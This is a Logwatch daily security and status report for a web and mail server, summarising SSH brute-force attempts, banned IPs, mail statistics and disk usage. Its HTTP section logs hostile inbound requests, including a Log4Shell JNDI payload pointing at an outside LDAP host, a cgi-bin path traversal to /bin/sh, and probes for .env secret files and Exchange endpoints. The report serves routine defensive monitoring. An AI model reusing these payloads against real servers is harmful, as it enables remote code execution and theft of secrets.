################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Mon Dec 20 04:42:05 2021
Date Range Processed: yesterday
( 2021-Dec-19 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 28:28 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 5 sites probed the server
109.74.204.123
161.35.230.3
61.219.11.151
64.227.99.233
66.240.205.34
Requests with error response codes
400 Bad Request
null: 8 Time(s)
mstshash=Domain: 4 Time(s)
/: 3 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 2 Time(s)
default.asp: 2 Time(s)
mstshash=Administr: 2 Time(s)
/.env: 1 Time(s)
/10196510: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s)
/config/getuser?index=0: 1 Time(s)
/manager/text/list: 1 Time(s)
7: 1 Time(s)
\xBB: 1 Time(s)
}\xD1>\xD8\x8E\xD1{\x1D\xFC\xF2kr\xC6\x01\ ... xBE\x00\xBD\xC0: 1 Time(s)
500 Internal Server Error
/: 21 Time(s)
/.env: 3 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/?a=%24%7Bjndi%3Aldap%3A//193.3.19.159%3A53/c%7D: 1 Time(s)
/GponForm/diag_Form?style/: 1 Time(s)
/actuator/health: 1 Time(s)
/favicon.ico: 1 Time(s)
/owa/: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (101.96.76.242): 43 Time(s)
root (1.116.25.72): 41 Time(s)
root (121.201.34.21): 34 Time(s)
root (211.157.148.2): 33 Time(s)
root (162.243.20.232): 31 Time(s)
root (1.14.49.221): 30 Time(s)
root (211.219.114.39): 27 Time(s)
root (119.29.60.96): 25 Time(s)
root (125.141.139.7): 25 Time(s)
unknown (162.243.20.232): 19 Time(s)
root (111.198.33.54): 17 Time(s)
root (139.198.13.109): 17 Time(s)
unknown (139.198.13.109): 17 Time(s)
unknown (121.201.34.21): 16 Time(s)
unknown (211.157.148.2): 16 Time(s)
root (114.67.116.17): 15 Time(s)
unknown (1.14.49.221): 14 Time(s)
unknown (119.29.60.96): 12 Time(s)
unknown (211.219.114.39): 11 Time(s)
root (183.194.212.16): 10 Time(s)
root (120.92.79.133): 7 Time(s)
unknown (101.96.76.242): 7 Time(s)
unknown (111.198.33.54): 7 Time(s)
unknown (1.116.25.72): 6 Time(s)
unknown (114.67.116.17): 6 Time(s)
unknown (125.141.139.7): 6 Time(s)
unknown (183.194.212.16): 6 Time(s)
root (115.221.81.85): 4 Time(s)
root (220.179.231.222): 4 Time(s)
unknown (120.92.79.133): 4 Time(s)
root (121.66.109.90): 3 Time(s)
root (36.110.228.254): 3 Time(s)
unknown (182.48.114.140): 3 Time(s)
root (40.125.214.159): 2 Time(s)
unknown (ip1f13d9ed.dynamic.kabel-deutschland.de): 2 Time(s)
unknown (wnpgmb0538w-ds01-138-65.dynamic.bellmts.net): 2 Time(s)
news (125.141.139.7): 1 Time(s)
root (114.7.162.198): 1 Time(s)
root (36.91.61.178): 1 Time(s)
unknown (115.221.81.85): 1 Time(s)
unknown (116.52.144.172): 1 Time(s)
unknown (220.179.231.222): 1 Time(s)
unknown (36.133.163.35): 1 Time(s)
unknown (40.125.214.159): 1 Time(s)
unknown (45.141.84.10): 1 Time(s)
Invalid Users:
Unknown Account: 160 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
5 Miscellaneous warnings
13.067K Bytes accepted 13,381
13.067K Bytes sent via SMTP 13,381
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
29 Connections
11 Connections lost (inbound)
29 Disconnections
1 Removed from queue
1 Sent via SMTP
1 SMTP dialog errors
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.14.49.221: 30 times
1.116.25.72: 41 times
36.91.61.178: 1 time
36.110.228.254: 3 times
40.125.214.159: 2 times
101.96.76.242 (ci96.76-242.netnam.vn): 43 times
111.198.33.54: 17 times
114.7.162.198 (114-7-162-198.resources.indosat.com): 1 time
114.67.116.17: 15 times
115.221.81.85: 4 times
119.29.60.96: 25 times
120.92.79.133: 7 times
121.66.109.90: 3 times
121.201.34.21 (121.201.34.21): 34 times
125.141.139.7: 26 times
139.198.13.109: 17 times
162.243.20.232: 31 times
183.194.212.16 (.): 10 times
211.157.148.2: 33 times
211.219.114.39: 27 times
220.179.231.222: 4 times
Illegal users from:
2001:470:1:c84::16: 1 time
undef: 120 times
1.14.49.221: 14 times
1.116.25.72: 6 times
31.19.217.237 (ip1f13d9ed.dynamic.kabel-deutschland.de): 2 times
36.133.163.35: 1 time
40.125.214.159: 1 time
45.83.66.144: 1 time
45.141.84.10: 1 time
64.62.197.152: 1 time
101.96.76.242 (ci96.76-242.netnam.vn): 7 times
109.74.204.123 (li151-123.members.linode.com): 1 time
111.198.33.54: 7 times
114.67.116.17: 6 times
115.221.81.85: 1 time
116.52.144.172: 1 time
119.29.60.96: 12 times
120.92.79.133: 4 times
121.201.34.21 (121.201.34.21): 16 times
125.141.139.7: 6 times
139.198.13.109: 17 times
162.243.20.232: 19 times
182.48.114.140: 3 times
183.194.212.16 (.): 6 times
193.169.254.138: 1 time
207.161.138.65 (wnpgmb0538w-ds01-138-65.dynamic.bellmts.net): 2 times
211.157.148.2: 16 times
211.219.114.39: 11 times
220.179.231.222: 1 time
**Unmatched Entries**
fatal: Unable to negotiate a key exchange method [preauth] : 1 time(s)
Protocol major versions differ for 109.74.204.123: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 1 time(s)
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (0,ssh-connection) [preauth] : 1 time(s)
Protocol major versions differ for 109.74.204.123: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-NmapNSE_1.0 : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################